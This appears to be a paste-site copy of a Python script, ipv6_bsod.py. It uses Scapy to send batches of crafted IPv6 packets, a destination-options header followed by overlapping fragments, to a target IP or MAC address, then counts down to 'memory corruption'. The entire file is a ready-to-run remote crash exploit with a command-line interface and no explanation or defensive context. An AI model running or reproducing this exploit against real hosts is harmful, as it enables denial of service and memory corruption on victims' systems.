ipv6_bsod.py 3.3 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101
  1. from scapy.all import *
  2. from sys import argv, exit
  3. def usage():
  4. print("Usage: ipv6_bsod -i (interface) --ip (ipaddr) -m (macaddr) -t (num_tries) -n (num_batches)")
  5. def get_packets(i: int, ip: str, mac: str) -> list:
  6. frag_id = 0xdebac1e + i
  7. if mac != '' and ip != '':
  8. first = Ether(dst=mac) / IPv6(fl=1, hlim=64+i, dst=ip) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
  9. second = Ether(dst=mac) / IPv6(fl=1, hlim=64+i, dst=ip) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
  10. third = Ether(dst=mac) / IPv6(fl=1, hlim=64+i, dst=ip) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
  11. return [first, second, third]
  12. elif ip != '':
  13. first = IPv6(fl=1, hlim=64+i, dst=ip) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
  14. second = IPv6(fl=1, hlim=64+i, dst=ip) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
  15. third = IPv6(fl=1, hlim=64+i, dst=ip) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
  16. return [first, second, third]
  17. else:
  18. print("Error: IP address is not set!")
  19. exit(1)
  20. if len(argv) == 1:
  21. usage()
  22. else:
  23. iface = ''
  24. ip = ''
  25. mac = ''
  26. num_tries = 0
  27. num_batches = 0
  28. for a in range(1, len(argv), 2):
  29. if argv[a] == "-i":
  30. if len(argv) > a+1:
  31. iface = argv[a+1]
  32. else:
  33. print("Error: interface is not set")
  34. exit(1)
  35. elif argv[a] == '--ip':
  36. if len(argv) > a+1:
  37. ip = argv[a+1]
  38. else:
  39. print("Error: IP is not set")
  40. exit(1)
  41. elif argv[a] == '-m':
  42. if len(argv) > a+1:
  43. mac = argv[a+1]
  44. else:
  45. print("Error: MAC address is not set")
  46. exit(1)
  47. elif argv[a] == '-t':
  48. if len(argv) > a+1:
  49. if argv[a+1].isdigit():
  50. num_tries = int(argv[a+1])
  51. else:
  52. print("Error: num_tries is not number, exiting...")
  53. exit(1)
  54. else:
  55. print("Error: num_tries is not set")
  56. elif argv[a] == '-n':
  57. if len(argv) > a+1:
  58. if argv[a+1].isdigit():
  59. num_batches = int(argv[a+1])
  60. else:
  61. print("Error: num_batches is not number, exiting...")
  62. exit(1)
  63. else:
  64. print("Error: num_batches is not set")
  65. exit(1)
  66. else:
  67. print(f"Error: invalid key '{argv[a]}'")
  68. exit(1)
  69. if iface == '':
  70. print("Error: interface is not set")
  71. exit(1)
  72. if ip == '':
  73. print("Error: IPv6 address is not set")
  74. exit(1)
  75. if num_tries == 0:
  76. print("Error: num_tries is not set")
  77. exit(1)
  78. if num_batches == 0:
  79. print("Error: num_batches is not set")
  80. exit(1)
  81. final_ps = []
  82. for _ in range(num_batches):
  83. for i in range(num_tries):
  84. final_ps += get_packets(i, ip, mac) + get_packets(i, ip, mac)
  85. print("Sending packets")
  86. if mac != '':
  87. sendp(final_ps, iface)
  88. else:
  89. send(final_ps, iface)
  90. for i in range(60):
  91. print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
  92. time.sleep(1)
  93. print("")